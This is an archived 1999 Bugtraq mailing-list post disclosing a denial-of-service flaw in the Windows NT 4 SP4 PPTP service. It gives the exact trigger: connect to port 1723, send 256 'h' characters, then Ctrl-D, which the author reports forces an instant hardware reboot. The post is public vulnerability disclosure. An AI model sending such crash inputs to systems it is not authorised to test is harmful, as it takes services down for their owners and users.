[10358] in bugtraq
Possible DOS in WinNT RAS (PPTP)
daemon@ATHENA.MIT.EDU (Simon Helson)
Mon Apr 26 18:03:39 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.2.0.32.19990427092053.009ad9a0@203.97.185.82>
Date: Tue, 27 Apr 1999 09:29:06 -0700
Reply-To: Simon Helson <simon@CONCEPTS.CO.NZ>
From: Simon Helson <simon@CONCEPTS.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Please excuse if this has been posted before, I did a quick search of the
archives and found nothing
This hasn't been sent to MS, as I don't know an email address to send it
to, Aleph, if you find it worthy of sending, please forward a copy to the
MS people for their attention. Cheers.
I was playing around with PPTP last night, and discovered that, with "very"
minimal effort, I could cause my friends NT Server (version 4, service pack
4) to reboot instantly, without shutting down. All I did was telnet to the
port (1723) on the NT box, and then send the following data.
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (that's 256 'h's for those who don't want to
count :-)
and hit return. nothing. BUT, then I hit ^D and all hell broke loose. The
NT server dropped like a stone, full hardware reboot.
I tested this multiple times and always got the same response.
The NT Server was version 4, with Service pack 4 applied.
Cheers
Simon
